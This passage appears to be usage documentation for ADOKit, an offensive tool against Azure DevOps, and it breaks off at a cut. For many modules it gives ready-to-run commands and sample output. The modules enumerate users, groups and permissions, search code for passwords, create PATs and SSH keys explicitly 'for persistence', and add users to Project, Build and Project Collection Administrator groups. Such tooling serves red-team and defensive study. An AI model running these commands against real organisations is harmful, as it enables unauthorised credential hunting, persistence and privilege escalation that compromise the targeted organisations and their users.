Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:44:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in Azure DevOps instance


Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:45:30 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in Azure DevOps instance


Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 3:22:21 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchco de

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in Azure DevOps


Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 11:28:34 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.


Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:09 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.


Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:17 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.


Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:04:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.


Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 2:51:22 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.


Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:37:10 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.


Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 1:50:08 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance


Provide the listuser module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.

ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization

Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:07 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
user1 | User 1 | [email protected]
jsmith | John Smith | [email protected]
rsmith | Ron Smith | [email protected]
user2 | User 2 | [email protected]

4/3/23 20:12:08 Finished execution of listuser

Search User

Use Case

Search for given user(s) in Azure DevOps instance


Provide the searchuser module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.

ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user

ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user

Example Output

C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"

Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:12:23 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
user1 | User 1 | [email protected] rosoft.com
user2 | User 2 | [email protected]

4/3/23 20:12:24 Finished execution of searchuser

List Groups

Use Case

List groups within an Azure DevOps instance


Provide the listgroup module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.

ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization

Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:45 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items w ithin the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by t he test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management


4/3/23 20:48:46 Finished execution of listgroup

Search Groups

Use Case

Search for given group(s) in Azure DevOps instance


Provide the searchgroup module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.

ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"

ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"

Example Output

C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"

Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 4:48:41 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, mod ify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
[TestProject]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[TestProject2]\Project Administrators | Project Administrators | Members of th is group can perform all operations in the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
[ProjectWithMultipleRepos]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project Collection Build Administrators | Project Collection Build Administrators | Members of this group should include accounts for people who should be able to administer the build resources.
[TestProject]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.

4/3/23 20:48:42 Finished execution of searchgroup

Get Group Members

Use Case

List all group members for a given group


Provide the getgroupmembers module and the group(s) you would like to search for in the /group: command-line argument, along with any relevant authentication information and URL. This will output the user principal name of the group matching, along with each group member of that group including the user's mail address and display name.

ADOKit.exe getgroupmembers /credential:apiKey /url:https://dev.azure.com/organizationName /group:"someGroup"

ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /group:"someGroup"

Example Output

C:\>ADOKit.exe getgroupmembers /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /group:"admin"

Module: getgroupmembers
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:03 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Group | Mail Address | Display Name
[TestProject2]\Build Administrators | [email protected] | User 1
[TestProject2]\Build Administrators | [email protected] | User 2
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | Ron Smith
[TestProject2]\Project Administrators | [email protected] | User 1
[TestProject2]\Project Administrators | [email protected] | User 2
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[ProjectWithMultipleRepos]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Build Administrators | [email protected] | Brett Hawkins

4/4/23 13:11:09 Finished execution of getgroupmembers

Get Project Permissions

Use Case

Get a listing of who has permissions to a given project.


Provide the getpermissions module and the project you would like to search for in the /project: command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group. Additionally, this will output the group members for each of those groups.

ADOKit.exe getpermissions /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someproject"

ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someproject"

Example Output

C:\>ADOKit.exe getpermissions /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap"

Module: getpermissions
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 9:11:16 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

UPN | Display Name | Description
[MaraudersMap]\Build Administrators | Build Administrators | Mem bers of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[MaraudersMap]\Project Administrators | Project Administrators | Members of this group can perform all operations in the team project.
[MaraudersMap]\Project Valid Users | Project Valid Users | Members of this group have access to the team project.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.

[*] INFO: List ing group members for each group that has permissions to this project

GROUP NAME: [MaraudersMap]\Build Administrators

Group | Mail Address | Display Name

GROUP NAME: [MaraudersMap]\Contributors

Group | Mail Address | Display Name
[MaraudersMap]\Contributo rs | [email protected] | User 1
[MaraudersMap]\Contributors | [email protected] | User 2

GROUP NAME: [MaraudersMap]\MaraudersMap Team

Group | Mail Address | Display Name
[MaraudersMap]\MaraudersMap Team | [email protected] | Brett Hawkins

GROUP NAME: [MaraudersMap]\Project Administrators

Group | Mail Address | Display Name
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins

GROUP NAME: [MaraudersMap]\Project Valid Users

Group | Mail Address | Display Name

GROUP NAME: [MaraudersMap]\Readers

Group | Mail Address | Display Name
[MaraudersMap]\Readers | [email protected] | John Smith

4/4/23 13:11:18 Finished execution of getpermissions

Add Project Admin

Use Case

Add a user to the Project Administrators group for a given project.


Provide the addprojectadmin module along with a /project: and /user: for a given user to be added to the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

Module: addprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 2:52:45 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins
[MaraudersMap]\Project Administrators | [email protected] | User 1

4/4/23 18:52:47 Finished execution of addprojectadmin

Remove Project Admin

Use Case

Remove a user from the Project Administrators group for a given project.


Provide the removeprojectadmin module along with a /project: and /user: for a given user to be removed from the Project Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removeprojectadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removeprojectadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

Module: removeprojectadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:19:43 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------------
[MaraudersMap]\Project Administrators | [email protected] | Brett Hawkins

4/4/23 19:19:44 Finished execution of removeprojectadmin

Add Build Admin

Use Case

Add a user to the Build Administrators group for a given project.


Provide the addbuildadmin module along with a /project: and /user: for a given user to be added to the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe addbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

Module: addbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:41:51 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------
[MaraudersMap]\Build Administrators | [email protected] | User 1

4/4/23 19:41:55 Finished execution of addbuildadmin

Remove Build Admin

Use Case

Remove a user from the Build Administrators group for a given project.


Provide the removebuildadmin module along with a /project: and /user: for a given user to be removed from the Build Administrators group for the given project. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removebuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /project:"someProject" /user:"someUser"

Example Output

C:\>ADOKit.exe removebuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /project:"maraudersmap" /user:"user1"

Module: removebuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 3:42:10 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Build Administrators group for the maraudersmap project.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------- -------------------------------------------------------------------------------------------------------------

4/4/23 19:42:11 Finished execution of removebuildadmin

Add Collection Admin

Use Case

Add a user to the Project Collection Administrators group.


Provide the addcollectionadmin module along with a /user: for a given user to be added to the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:04:40 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith
[YourOrganization]\Project Collection Administrators | [email protected] | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.


Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 4:10:35 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | [email protected] | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.


Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:39 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | [email protected] | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.


Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:21:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.


Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:13 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | [email protected] | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.


Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url:https://dev.azure.com/organizationName /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization /user:"user1"

Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/5/2023 8:22:27 AM

